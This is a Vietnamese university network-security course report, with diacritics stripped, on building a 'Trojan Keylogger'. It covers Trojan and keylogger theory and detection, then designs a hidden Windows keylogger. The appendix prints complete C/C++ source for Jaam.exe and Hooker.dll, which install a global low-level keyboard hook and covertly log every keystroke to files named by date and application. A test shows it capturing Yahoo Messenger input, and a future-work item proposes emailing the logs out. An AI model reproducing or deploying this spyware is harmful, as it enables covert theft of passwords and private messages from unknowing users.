TRNG I HC BCH KHOA

KHOA CNG NGH THNG TIN

B MN MNG V TRUYN THNG

AN TON THNG TIN MNG

ti 15:

Xy dng chng trnh

Trojan Keylogger

Gio vin hng dn

Sinh vin thc hin
:
Lp
Nhm

:
:

TS. NGUYN TN KHI

L PHAN SN ANH
NGUYN H HI NG
NG PHAN MINH HI
08T4
12

Nng 2012

Bo Co An Ton Thng Tin Mng

MC LC
MC LC....................................................................................................................2
Chng 1. C S L THUYT.................................................................................3
1.1 Gii thiu................................................................................................................3
1.2 Tm hiu v Trojan.................................................................................................5
1.2.1 Cc dng Trojans c bn:.................................................................................5
1.2.2 Mc ch ca nhng k vit ra nhng Trojans:.................................................5
1.2.3 Nhng con ng my tnh nn nhn nhim Trojan:...................................6
1.2.4 Nhng cch nhn bit mt my tnh b nhim Trojan:......................................6
1.3 Gii thiu v KeyLogger........................................................................................7
1.3.1 KeyLogger l g?..............................................................................................7
1.3.2 Phn loi KeyLogger:.......................................................................................7
1.3.3 Cch hot ng ca KeyLogger:.......................................................................8
1.4 Cch pht hin v phng chng..............................................................................9
1.4.1 Cch pht hin Trojan:......................................................................................9
1.4.2 Cch phng chng:.........................................................................................13
Chng 2. PHN TCH V THIT K CHNG TRNH....................................14
2.1 M t bi ton.......................................................................................................14
2.2 Phn tch yu cu..................................................................................................14
2.2.1 Yu cu v chc nng:....................................................................................14
2.2.2 Yu cu v giao din ngi dng:..................................................................14
2.2.3 Yu cu v tng thch:..................................................................................14
2.3 Phn tch chc nng..............................................................................................14
2.4 K thut Hook.......................................................................................................14
2.4.1 Gii thiu:.......................................................................................................14
2.4.2 Chui Hook:...................................................................................................15
2.4.3 Th tc Hook:.................................................................................................15
2.4.4 Cch s dng Hook:.......................................................................................16
2.5 Thut ton.............................................................................................................17
2.5.1 Hm WriteStringToFile(char *txt):................................................................17
2.5.2 Hm LogKeyboard:........................................................................................17
Chng 3. TRIN KHAI NH GI KT QU....................................................18
3.1 Mi trng trin khai............................................................................................18
3.2 Kt qu chc nng chng trnh...........................................................................18
3.3 u v nhc im.................................................................................................20
3.3.1 u im:.........................................................................................................20
3.3.2 Nhc im:...................................................................................................20
3.4 Hng pht trin...................................................................................................20
20
TI LIU THAM KHO..........................................................................................21
PH LC...................................................................................................................22

SVTH: Sn Anh Hi ng Minh Hi 08T4

2

Bo Co An Ton Thng Tin Mng

Chng 1.
1.1

C S L THUYT

Gii thiu
Mt Trojan l mt chng trnh nh chy ch n v gy hi cho my tnh.
Vi s tr gip ca Trojan, mt k tt cng c th d dng truy cp vo my

tnh ca nn nhn thc hin mt s vic nguy hi nh ly cp d liu, xa file, v

nhiu kh nng khc.

Cng ging nh Nga Thnh Troy trong thn thoi trng c v nh l mt

mn qu, nhng thc ra c cha lnh Hy Lp, bn chng chim thnh Troy. Trojan
l mt chng trnh dng vi rt, mt k lm ni gin trong my tnh ca bn gip
cho tn tin tc (hacker) iu khin my tnh ca bn, Trojan gip tn tin tc ly nhng
thng tin qu bu ca bn, thm ch hn c th xa hoc nh dng li c cng ca
bn na. Trojan c th nhim vo my ca bn qua tp tin gn km th in t m
bn v tnh ti v v chy th, hoc c ln trong nhng chng trnh tr chi,
nhng chng trnh m bn khng r ngun gc
moi rut c mt khu ca cc ch thu bao, hacker ni thng s dng
vi rt c h Trojan (vi rt thnh Troa) gi n cc thu bao cn tn cng thng qua
th in t (e-mail) di dng d liu nh km (File Attachment). Ch cn khi cc
ch thu bao v tnh m file ny, lp tc vi rt Trojan c kch ng v t ng sao
SVTH: Sn Anh Hi ng Minh Hi 08T4
3

Bo Co An Ton Thng Tin Mng

chp li tt c cc thng s v mt khu ca ch thu bao. Khng ch l mt khu truy

cp Intemet m ngay c n mt khu ca hm th in t cng d dng b nh cp.
Ngay sau khi ch thu bao kt ni Internet, vi rt Trojan s b mt sinh ra mt e- mail
v gi mt khu nh cp v cho tin tc. V sau mi ln thay i mt khu virus
Trojan s tip tc lng l tun ca n cp ti mt a ch m hacker ni nh sn.
nh la nn nhn, tin tc lun tm cch ging ra nhng loi by ht
sc tinh vi. Tinh vi n ni khng t ch thu bao d rt k tnh nhng vn c sp
by nh thng. Ph bin nht l hacker ni i lt nhng t chc hay cng ty c uy
tn nh la ch thu bao bng chng trnh phn mm th ma Ghostmail. tin
tc d dng tho ra nhng e-mail mo danh vi ni dung: Hin gi tnh trng nh
cp mt khu thu bao ang rt ph bin. Khi nhn c nhng tin kiu nh vy, c
khng t thu bao d dng cn cu v c t nhin cho chy chng trnh vi rt
Trojan m khng h nhn thc c rng h ang t nguyn hin mnh thnh nn
nhn ca bn tin tc
Nh vy, khi Trojan c kch hot trn my ca bn v khi bn truy cp
Internet th Trojan c th ly mt khu truy cp mng, ly danh sch th in t v
thm ch c cu hnh my tnh ca bn gi cho mt a ch th in t ca tn tin
tc. Nhng nguy him hn, Trojan cn gi c a ch mng IP, l a ch m nh cung
cp dch v mng (ISP) gn cho bn lc truy cp; tn tin tc s s dng a ch IP ca
bn thit lp kt ni t my tnh ca hn ti my tnh ca bn qua mng Internet.
Trojan s ly thng tin, xa thng tin
Tc hi ca Trojan:
* Xo hay vit li cc d liu trn my tnh.
* Lm hng chc nng ca cc tp.
* Ly nhim cc phn mm c tnh khc nh l virus.
* Ci t mng my c th b iu khin bi my khc hay dng my nhim
gi th nhng lm.
* c ln cc thng tin cn thit v gi bo co n ni khc.
* n cp thng tin nh l mt khu v s th tn dng.
* c cc chi tit ti khon ngn hng v dng vo cc mc tiu phm ti.
SVTH: Sn Anh Hi ng Minh Hi 08T4
4

Bo Co An Ton Thng Tin Mng

* Ci t ln cc phn mm cha c cho php.

1.2

Tm hiu v Trojan
K tn cng c th truy cp c vo cc my tnh b nhim Trojans khi

chng Online. Sau c th truy cp v iu khin ton b my tnh ca nn nhn, v

chng c kh nng s dng vo nhiu mc ch khc nhau.

1.2.1

Cc dng Trojans c bn:

* Remote Access Trojans Cho k tn cng kim sot ton b h thng t xa.
* Data-Sending Trojans Gi nhng thng tin nhy cm cho k tn cng.
* Destructive Trojans Ph hy h thng.
* Denied-of-Service DoS Attack Trojan: Trojans cho tn cng DoS.
* Proxy Trojans.
* HTTP, FTP Trojans - Trojan t to thnh HTTP hay FTP server k tn
cng khai thc li.
* Security Software Disable Trojan.
1.2.2

Mc ch ca nhng k vit ra nhng Trojans:

* Ly thng tin ca cc ti khon c nhn nh: Email, Password,

* Nhng d liu mt.
* Thng tin ti chnh: Ti khon ngn hng
* S dng my tnh ca nn nhn thc hin mt tc v no , nh tn
cng, scan, hay lm ngp h thng mng ca nn nhn.

SVTH: Sn Anh Hi ng Minh Hi 08T4

5

Bo Co An Ton Thng Tin Mng

1.2.3

Nhng con ng my tnh nn nhn nhim Trojan:

* Qua cc ng dng CHAT online nh IRC Interney Relay Chat.

* Qua cc file c nh km trn Mail
* Qua tng vt l nh trao i d liu qua USB, CD, HDD
* Khi chy mt file b nhim Trojan.
* Qua NetBIOS FileSharing.
* Qua nhng chng trnh nguy him.
* T nhng trang web khng tin tng hay nhng website cung cp phn mm
min ph.
* N c kh nng n trong cc ng dng bnh thng, khi chy ng dng
lp tc cng chy lun Trojans.
1.2.4

Nhng cch nhn bit mt my tnh b nhim Trojan:

* CD-ROM t ng m ra ng vo.
* My tnh c nhng du hiu l trn mn hnh.
* Hnh nn ca cc ca s Windows b thay i
* Cc vn bn t ng in.
* My tinh t ng thay i font ch v cc thit lp khc.
* Hnh nn my tnh t ng thay i v khng th i li.
* Chut tri, chut phi ln ln.
* Chut khng hin th trn mn hnh.
* Nt Start khng hin th.

SVTH: Sn Anh Hi ng Minh Hi 08T4

6

Bo Co An Ton Thng Tin Mng

1.3

Gii thiu v KeyLogger

1.3.1

KeyLogger l g?

Keylogger hay "trnh theo di thao tc bn phm" theo cch dch ra ting
Vit l mt chng trnh my tnh ban u c vit nhm mc ch theo di v ghi
li mi thao tc thc hin trn bn phm vo mt tp tin nht k (log) cho ngi ci
t n s dng. V chc nng mang tnh vi phm vo ring t ca ngi khc ny nn
cc trnh keylogger c xp vo nhm cc phn mm gin ip.
V sau, khi keylogger pht trin cao hn n khng nhng ghi li thao tc bn
phm m cn ghi li c cc hnh nh hin th trn mn hnh (screen) bng cch chp
(screen-shot) hoc quay phim (screen-capture) thm ch cn ghi nhn cch con
tr chut trn my tnh di chuyn.
1.3.2

Phn loi KeyLogger:

Keylogger bao gm hai loi, mt loi keylogger phn cng v mt loi l phn
mm.

Bi vit ny ni n loi phn mm.

Theo nhng ngi lp trnh, keylogger vit ra vi ch c mt loi duy nht l

gip cc bn gim st con ci, ngi thn xem h lm g vi PC, vi internet,

khi chat vi ngi l. Nhng cch s dng v chc nng ca keylogger hin ti trn
th gii khin ngi ta thng hay phn loi keylogger theo mc nguy him bng
cc cu hi:
Nhim vo my khng qua ci t/Ci t vo my cc nhanh (quick install)?
C thuc tnh n/giu trn trnh qun l tin trnh (process manager) v trnh ci
t v g b chng trnh (Add or Remove Program)?
Theo di khng thng bo/PC b nhim kh t pht hin?
C thm chc nng Capturescreen hoc ghi li thao tc chut?
SVTH: Sn Anh Hi ng Minh Hi 08T4
7

Bo Co An Ton Thng Tin Mng

Kh tho g?
C kh nng ly nhim, chng tt (kill process)?
C mi cu tr li "c", cho mt im. im cng cao, keylogger cng vt
khi mc ch gim st (monitoring) n vi mc ch do thm (spying) v tnh nguy
him n cng cao. Keylogger c th c phn loi theo s im:

Loi s 1

Khng im: keylogger loi bnh thng; chy cng khai, c thng bo cho
ngi b theo di, ng vi mc ch gim st.

Loi s 2

Mt n hai im: keylogger nguy him; chy ngm, hng n mc ch do

thm nhiu hn l gim st (nguy hi n cc thng tin c nhn nh l ti khon c
nhn, mt khu, th tn dng v ngi dng khng bit).

Loi s 3

Ba n nm im: keylogger loi rt nguy him; n du hon ton theo di trn

mt phm vi rng, mc ch do thm r rng.

Loi s 4

Su im: keylogger nguy him nghim trng, thng c mang theo bi cc

trojan-virus cc k kh tho g, l loi keylogger nguy him nht. Chnh v vy (v
cng do ng thi l ng bn ca trojan-virus) n thng hay b cc chng trnh
chng virus tm thy v tiu dit.
1.3.3

Cch hot ng ca KeyLogger:

1.3.3.1

Thnh phn ca Keylogger

Thng thng, mt chng trnh keylogger s gm c ba phn chnh:

Chng trnh iu khin (Control Program): dng theo iu phi hot ng,
tinh chnh cc thit lp, xem cc tp tin nht k cho Keylogger. Phn ny l phn
c giu k nht ca keylogger, thng thng ch c th gi ra bng mt t hp
phm tt c bit.
SVTH: Sn Anh Hi ng Minh Hi 08T4
8

Bo Co An Ton Thng Tin Mng

Tp tin hook, hoc l mt chng trnh monitor dng ghi nhn li cc thao
tc bn phm, capture screen (y l phn quan trng nht)
Tp tin nht k (log), ni cha ng/ghi li ton b nhng g hook ghi nhn
c.
Ngoi ra, ty theo loi c th c thm phn chng trnh bo v (guard,
protect), chng trnh thng bo (report)

1.3.3.2

Cch thc ci t vo my

Cc loi keylogger t 1 - 3 thng thng khi ci t vo my cng ging nh

mi chng trnh my tnh khc, u phi qua bc ci t. u tin n s ci t cc
tp tin dng hot ng vo mt th mc c bit (rt phc tp), sau ng k
cch thc hot ng ri i ngi dng thit lp thm cc ng dng. Sau n bt
u hot ng.
Loi keylogger s 4 c th vo thng my ca ngi dng b qua bc ci t,
dng tnh nng autorun cng chy vi h thng. Mt s loi t th (drop) mnh vo
cc chng trnh khc, khi ngi dng s dng cc chng trnh ny keylogger s
t ng chy theo.
1.3.3.3

Cch hot ng

Trong mt h thng (Windows, Linux, Mac), khi bm 1 phm trn bn phm,

bn phm s chuyn n thnh tnh hiu chuyn vo CPU. CPU s chuyn n ti h
iu hnh h iu hnh dch thnh ch hoc s cho chnh n hoc cc chng trnh
khc s dng.
Nhng khi trong h thng c keylogger, khng nhng ch c h iu hnh
theo di m c hook file/monitor program ca keylogger theo di n s ghi nhn v
dch li cc tnh hiu ghi vo tp tin nht k. ng thi n cn c th theo di c mn
hnh v thao tc chut.
1.4 Cch pht hin v phng chng
1.4.1

Cch pht hin Trojan:

C ba nguyn l ca bt k chng trnh Trojan no:

SVTH: Sn Anh Hi ng Minh Hi 08T4
9

Bo Co An Ton Thng Tin Mng

- Mt trojan mun hot ng phi lng nghe cc request trn mt cng no

- Mt chng trnh ang chy s phi c TN trong Process List
- Mt chng trnh Trojan s lun chy cng lc khi my tnh khi ng.
1.4.1.1

Pht hin Port s dng bi Trojans:

- Dng cu lnh Netstat an trong windows bit h thng ang lng nghe
trn cc port no.
+ Hnh di ta thy c port 7777 y l port ca Tini Trojan.
+ Ta thy port 8800 ang ch nghe v c my ang kt ni n, c th
l ca Trojans.

- Dng phn mm Fport

- Dng phn mm TCPView
Ta c th xem ton b cc port ang s dng v chng trnh g ang s dng
port no.
T y ta c th kim tra cc dch v mng vi nhng Port nghi ng ta c th
dng Firewall ng li.

SVTH: Sn Anh Hi ng Minh Hi 08T4

10

Bo Co An Ton Thng Tin Mng

SVTH: Sn Anh Hi ng Minh Hi 08T4

11

Bo Co An Ton Thng Tin Mng

1.4.1.2

Cch pht hin cc chng trnh ang chy:

- Dng phn mm Process Viewer tt c cc Process s c hin th d c

ang chy ch n v khng hin trn Task Manager ca Windows.

SVTH: Sn Anh Hi ng Minh Hi 08T4

12

Bo Co An Ton Thng Tin Mng

1.4.1.3

Tm mt chng trnh chy lc khi ng:

- Trong Startup
- Trong Registry: a s s nm ti y: Chng ta s dng cu lnh Msconfig
trong Table Startup chng trnh no mun chy t ng s phi nm ti y.
Trong v d ny c file nc.exe chy lc khi ng v tr ca n l ti folder
c:\vnexperts.net

1.4.2

Cch phng chng:

- Khng s dng cc phn mm khng tin tng (i khi tin tng vn b dnh
Trojans).
- Khng vo cc trang web nguy him, khng ci cc ActiveX v JavaScript
trn cc trang web bi c th s nh km Trojans.
- Ti quan trng l phi update OS thng xuyn.
- Ci phn mm dit virus uy tn nh: Kaspersky Internet Security, Norton
Internet Security, v Mcafee Total Security. Sau khi ci cc phn mm ny bn hy
update n thng xuyn.

SVTH: Sn Anh Hi ng Minh Hi 08T4

13

Bo Co An Ton Thng Tin Mng

Chng 2.
2.1

PHN TCH V THIT K CHNG TRNH

M t bi ton
Xy dng mt chng trnh Trojan Keylogger c kh nng ghi li cc thao tc

bn phm ca cc chng trnh m ngi dng ang s dng.

2.2

Phn tch yu cu
2.2.1

Yu cu v chc nng:

Chng trnh ghi li ton b thao tc phm ca ngi dng v lu ra mt tp

tin vn bn.
2.2.2

Yu cu v giao din ngi dng:

y l chng trnh mang tnh cht gin ip nn s c chy n trong h

thng v khng c giao din ha, ngi dng ch c th xem qua Task Manager.
2.2.3

Yu cu v tng thch:

m bo c s tng tc tt nht vi window, trong chng trnh ny

chng em s dng ngn ng C++ trn mi trng Dev C++, Visual C++.
2.3

2.4

Phn tch chc nng

-

Phn tch cc tin trnh, ca s ang nhp d liu.

Ghi li ton b thao tc bn phm.

Lu ra cc tp tin vn bn theo ngy thng v tn ng dng.

K thut Hook
2.4.1

Gii thiu:

Hook l mt k thut x l thng ip rt mnh cho php chng ta can thip

su vo cc tin trnh khc nhau, nhng n lm nh hng ti tc ca h thng,
nht l hook system-wide, v tt c cc s kin ca h thng s c nh hng ti
mt hm no , r rng iu ny lm h thng chm i ng k. V th ta ch hn

SVTH: Sn Anh Hi ng Minh Hi 08T4

14

Bo Co An Ton Thng Tin Mng

hook nhng thng ip tht cn thit v kt thc vic hook ngay khi khng dng n
na.
Cc m hnh Hook:
- Local hook: l k thut Hook dng by s kin ngay trong tin trnh ci
t.
- Remote hook: l k thut Hook cho php by cc s kin thuc tin trnh ca
ng dng khc. Trong m hnh ny li tn ti hai kiu hook khc :
+ Thread-specific : kiu Hook ny s by s kin ca mt lung c th.
+ System-wide : by s kin ca tt c cc lung trong tt c cc tin
trnh ang thi hnh trong h thng.
Thnh phn ca Hook:
Chui Hook
Th tc Hook
Cc kiu Hook
2.4.2

Chui Hook:

H thng c kh nng h tr nhiu kiu hook khc nhau, mi kiu li c quy

nh mt cch thc truy nhp khc nhau trong k thut iu khin thng ip. Do vy,
h thng duy tr mt chui cc hook cho mi mt kiu hook khc nhau.
Mt chui hook l mt danh sch cc con tr c bit, n c tr ti cc hm
CallBack gi l hook procedure (th tc hook). Nh vy khi mt s kin xut hin, h
thng s chuyn s kin ti cc th tc hook c tham chiu bi chui hook theo
th t ln lt. V th phi thc hin xong th tc ny mi c gi th tc k tip.
2.4.3

Th tc Hook:

Th tc hook s l ni thc hin cc thao tc sau khi bt c mt s kin

mong mun. Cc th tc hook ph thuc vo cc kiu hook khc nhau m c cu trc,
chc nng khc nhau. C th tc ch c th iu khin thng ip, mt s khc c th
sa i thng ip, dng tin trnh ca thng ip, ngn cn thc hin hook tip theo
hoc a ti ca s cui cng
SVTH: Sn Anh Hi ng Minh Hi 08T4
15

Bo Co An Ton Thng Tin Mng

Th tc hook c dng chung nh sau:

LRESULT CALLBACK HookProc( int nCode, WPARAM wParam,
LPARAM lParam );
Trong :
- HookProc: l tn i din ca th tc hook c ci t
- nCode : y l m hook, n quyt nh ton b hot ng ca th tc hook,
m hook ph thuc vo kiu hook v mi kiu hook c gn cho mt k t thit
lp m hook.
- wParam, lParam: Hai tham s ny cha cc thng tin v thng ip c
hook v n ph thuc vo m hook (nCode).
2.4.4
2.4.4.1

Cch s dng Hook:

Ci t Hook

Ta c th ci t th tc hook vo chui hook bng vic gi hm

SetWindowsHookEx v ch ra kiu hook ang gi th tc, vic ci t hook c th
thc hin trn mi tin trnh trong h thng.
Nu s dng hook ton cc th phi t trong th vin lin kt ng (DLL).
ng dng mun s dng th vin lin kt ng phi ly c handle ca th vin .
nhn Handle ca th vin lin kt ng ta c th s dng hm LoadLibrary vi
tham s l tn ca th vin. Sau khi c c Handle ca DLL, ta s ly a ch ca th
tc hook trong th vin lin kt ng thng qua hm GetProcAddress. Sau khi c
th tc hook, s dng hm SetWindowsHookEx ci t th tc hook vo trong
chui hook.
2.4.4.2

Gii phng Hook

Nh ni th hook nn c b i nu nh khng cn thit na bng cch s

dng hm UnhookWindowsHookEx.
Vi thread-specific hook, vic s dng hm UnhookWindowsHookEx s gii
phng th tc hook. Tuy nhin vi hook ton tc (system-wide hook) th hm ny
khng th tr t do cho hm DLL. Vic gi hm LoadLibrary s gi trong ng cnh
ca tt c cc tin trnh, tuy nhin hm FreeLibrary th khng th thc hin vi cc
SVTH: Sn Anh Hi ng Minh Hi 08T4
16

Bo Co An Ton Thng Tin Mng

tin trnh khc. V vy, khng c cch no gii phng DLL. H thng ch c th
gii phng DLL khi tt c cc tin trnh lin kt ti DLL phi kt thc hoc gi
FreeLibrary.
Gii php t ra cho vn ny l xy dng hm ci t ngay trong th vin
DLL. Bng vic lin kt ti DLL, ng dng c th ci t hook. V ngay trong DLL
cng phi c hm gii phng hook gii phng khi khng cn n na.
2.5

Thut ton
2.5.1

Hm WriteStringToFile(char *txt):

- Gi hm GetLocalTime(&st) ly thi gian ca h thng gn vo st.

- Gi hm GetForegroundWindow() ly a ch ca ca s ang s dng.
- Truyn a ch ca s va tm c vo hm GetWindowThreadProcessId
ly a ch ng dng ang chy vo bin processID.
- M (nu c) hoc to mi (nu cha c) mt file text vi tn l ngy v
tn ng dng ang chy.
sprintf(str,"d:\\key-%d_%d_%d-%s.txt",st.wYear,st.wMonth,st.wDay,
GetExecutor(processID));
out=fopen(str,"a");

- Ghi k t txt vo file va m.

2.5.2

Hm LogKeyboard:

- Khai bo 1 con tr keycode kiu KBDLLHOOKSTRUCT cha thng tin s

kin u vo ca bn phm.
- Nu phm bm l ci phm c bit th gi hm WriteStringToFile ghi
vo file nhng cm t tng ng vi phm .
if
if
if
if
if
if
if
if

if (keycode->vkCode == VK_RETURN) WriteStringToFile("{Enter}");

(keycode->vkCode == VK_BACK) WriteStringToFile("{Backspace}");
(keycode->vkCode == VK_DELETE) WriteStringToFile("{Delete}");
(keycode->vkCode == VK_HOME) WriteStringToFile("{Home}");
(keycode->vkCode == VK_END) WriteStringToFile("{End}");
(keycode->vkCode == VK_LEFT) WriteStringToFile("{Left}");
(keycode->vkCode == VK_RIGHT) WriteStringToFile("{Right}");
(keycode->vkCode == VK_UP) WriteStringToFile("{Up}");
(keycode->vkCode == VK_DOWN) WriteStringToFile("{Down}");

- Cn li th ghi vo file vi k t tng ng ca phm bm .

SVTH: Sn Anh Hi ng Minh Hi 08T4
17

Bo Co An Ton Thng Tin Mng

Chng 3.
3.1

TRIN KHAI NH GI KT QU

Mi trng trin khai

Phn mm c trin khai chy th trn cc phin bn ca Win7.

3.2

Kt qu chc nng chng trnh

Kt qu khi chy chng trnh.

Hnh 1 Chng trnh Jaam.exe chy ngm

SVTH: Sn Anh Hi ng Minh Hi 08T4

18

Bo Co An Ton Thng Tin Mng

Hnh 2 S dng ng dng Yahoo Messenger

Hnh 3 Kt qu ghi c t chng trnh

Hnh 4 Ni dung mt tp tin log

SVTH: Sn Anh Hi ng Minh Hi 08T4

19

Bo Co An Ton Thng Tin Mng

3.3

u v nhc im
Sau khi trin khai chy th ng dng, nhm chng em rt ra cc nhn xt nh

gi sau:
3.3.1

u im:

- Chng trnh khng lm tng ng k thi gian hin th phm bm.

- Chng trnh ghi li c 100% thao tc phm.
- Cc tp tin ghi li theo ngy v ng dng m ngi s dng g phm thng
tin chnh xc 100%.
3.3.2

Nhc im:

- Vn cn k t l trong bn log. Nguyn nhn l do cc k t Unicode c

tr v t chng trnh Unikey.
- V chng trnh bt tt c thao tc bn phm ca tt c cc ng dng c
chy nn to ra hi nhiu file text d tha.
3.4

Hng pht trin

- To ra file cu hnh cho chng trnh Trojan c v x l bt phm bm

ca cc ng dng m ngi dng quan tm.

- Pht trin Trojan t gi thng tin v mail.

SVTH: Sn Anh Hi ng Minh Hi 08T4

20

Bo Co An Ton Thng Tin Mng

TI LIU THAM KHO

- Website wikipedia.org
- Software Requirement Specification Template IEEE
- An Analysis of the System
Salman A. Baset and Henning Schulzrinne
Department of Computer Science
Columbia University, New York NY 10027
{salman,hgs}@cs.columbia.edu
September 15, 2004

SVTH: Sn Anh Hi ng Minh Hi 08T4

21

Bo Co An Ton Thng Tin Mng

PH LC
Tp tin thi hnh Jaam.exe
#include "stdafx.h"
#include <windows.h>
/* Declare Windows procedure */
LRESULT CALLBACK WindowProcedure (HWND, UINT, WPARAM, LPARAM);
/* Make the class name into a global variable */
char szClassName[ ] = "WindowsApp";
HINSTANCE hinstDLL;
HHOOK hHook = NULL;
typedef VOID (*LOADPROC)(HHOOK hHook);
int WINAPI WinMain (HINSTANCE hThisInstance,
HINSTANCE hPrevInstance,
LPSTR lpszArgument,
int nFunsterStil)
{
hinstDLL = LoadLibrary(TEXT("Hooker"));
if (hinstDLL == NULL) { MessageBox(0,L"Not found.",L"Error",0); return 0; }
HOOKPROC hpr = (HOOKPROC)GetProcAddress(hinstDLL,"LogKeyboard");
if (hpr == NULL) { MessageBox(0,L"Unvail lib.",L"Error",0); return 0; }
hHook = SetWindowsHookEx(WH_KEYBOARD_LL, hpr, hinstDLL, 0);
if (hHook == NULL) { MessageBox(0,L"Corrupt lib.",L"Error",0); return 0; }
LOADPROC lpr = (LOADPROC)GetProcAddress(hinstDLL,"SetGlobalHook");
lpr(hHook);
HWND hwnd;
MSG messages;

/* This is the handle for our window */

/* Here messages to the application are saved */

/* Run the message loop. It will run until GetMessage() returns 0 */

while (GetMessage (&messages, NULL, 0, 0))
{
/* Translate virtual-key messages into character messages */
TranslateMessage(&messages);
/* Send message to WindowProcedure */
DispatchMessage(&messages);
}
/* The program return-value is 0 - The value that PostQuitMessage() gave */
return messages.wParam;
}
/* This function is called by the Windows function DispatchMessage() */
LRESULT CALLBACK WindowProcedure (HWND hwnd, UINT message, WPARAM wParam,
LPARAM lParam)
{
switch (message)
/* handle the messages */
{
case WM_DESTROY:

SVTH: Sn Anh Hi ng Minh Hi 08T4

22

Bo Co An Ton Thng Tin Mng

PostQuitMessage (0);
/* send a WM_QUIT to the message queue */
UnhookWindowsHookEx(hHook);
hHook=NULL;
break;
default:
/* for messages that we don't deal with */
return DefWindowProc (hwnd, message, wParam, lParam);

}
return 0;

Th vin Hooker.dll
// dllmain.cpp : Defines the entry point for the DLL application.
#include <windows.h>
#include <conio.h>
#include <stdio.h>
#include <ctype.h>
#include <string>
#include <tchar.h>
#include <stdio.h>
#include <psapi.h>
#pragma data_seg(".SHARDAT")
HHOOK hGlobalHook = NULL;
FILE *out;
#pragma data_seg()
int PrintModules( DWORD processID );
void WriteStringToFile(char *txt);
void WriteEnterToFile();
LRESULT CALLBACK LogKeyboard(int nCode, WPARAM wParam, LPARAM lParam)
{
if (nCode == HC_ACTION && wParam == WM_KEYDOWN)
{
bool isDownShift = ((GetKeyState(VK_SHIFT) & 0x80) == 0x80 ? true : false);
bool isDownCapslock = (GetKeyState(VK_CAPITAL) != 0 ? true : false);
bool isDownCtrl = ((GetKeyState(VK_CONTROL) & 0x80) == 0x80 ? true : false);
byte keyState[256];
GetKeyboardState(keyState);
WORD w;
KBDLLHOOKSTRUCT* keycode = (KBDLLHOOKSTRUCT*)lParam;
if (keycode->vkCode == VK_RETURN) WriteStringToFile("{Enter}");
if (keycode->vkCode == VK_BACK) WriteStringToFile("{Backspace}");
if (keycode->vkCode == VK_DELETE) WriteStringToFile("{Delete}");
if (keycode->vkCode == VK_HOME) WriteStringToFile("{Home}");
if (keycode->vkCode == VK_END) WriteStringToFile("{End}");
if (keycode->vkCode == VK_LEFT) WriteStringToFile("{Left}");
if (keycode->vkCode == VK_RIGHT) WriteStringToFile("{Right}");
if (keycode->vkCode == VK_UP) WriteStringToFile("{Up}");
if (keycode->vkCode == VK_DOWN) WriteStringToFile("{Down}");
else if (ToAscii(keycode->vkCode,
keycode->scanCode,
keyState,
&w,
keycode->flags) == 1)
{
char key = (char)w;

SVTH: Sn Anh Hi ng Minh Hi 08T4

23

Bo Co An Ton Thng Tin Mng

if ((isDownCapslock ^ isDownShift) && ((key >= 65 && key <= 90) || (key >= 97 &&
key <= 122 )))
{
key = toupper(key);
}
if (isDownCtrl) {
char str[100];
sprintf(str,"{Ctrl - %c}",(char)keycode->vkCode);
WriteStringToFile(str);}
else {
char str[100];
sprintf(str,"%c",key);
WriteStringToFile(str);}
}
}
return CallNextHookEx( hGlobalHook, nCode, wParam, lParam );
}
void SetGlobalHook(HHOOK hHook)
{
hGlobalHook = hHook;
}
char* GetExecutor( DWORD processID )
{
HMODULE hMods[1024];
HANDLE hProcess;
DWORD cbNeeded;
unsigned int i;
char* result = (char*)malloc( 1000 );;
// Get a handle to the process.
hProcess = OpenProcess( PROCESS_QUERY_INFORMATION |
PROCESS_VM_READ,
FALSE, processID );
if (NULL == hProcess)
return "";
// Get a list of all the modules in this process.
if( EnumProcessModules(hProcess, hMods, sizeof(hMods), &cbNeeded))
{
for ( i = 0; i < (cbNeeded / sizeof(HMODULE)); i++ )
{
TCHAR szModName[MAX_PATH];
// Get the full path to the module's file.
if ( GetModuleBaseName( hProcess, hMods[i], szModName,
sizeof(szModName) / sizeof(TCHAR)))
{
// Print the module name and handle value.
TCHAR* prcName = szModName;
wcstombs( result, szModName, 1000 );
}
break;
}

SVTH: Sn Anh Hi ng Minh Hi 08T4

24

Bo Co An Ton Thng Tin Mng

// Release the handle to the process.
CloseHandle( hProcess );
return result;
}
void WriteStringToFile(char* txt)
{
// File name by Time and App
// Curren Time
SYSTEMTIME st;
GetLocalTime(&st);
// Current App
HWND curhwndWindow = GetForegroundWindow(); //lay dia chi cua so dang dung
DWORD processID;
GetWindowThreadProcessId(curhwndWindow, &processID);
char str[100];
sprintf(str,"d:\\key-%d_%d_%d-%s.txt",st.wYear,st.wMonth,st.wDay,
GetExecutor(processID));

out=fopen(str,"a");
fprintf(out,"%s",txt);
fclose(out);

BOOL APIENTRY DllMain( HMODULE hModule,

DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}

SVTH: Sn Anh Hi ng Minh Hi 08T4

25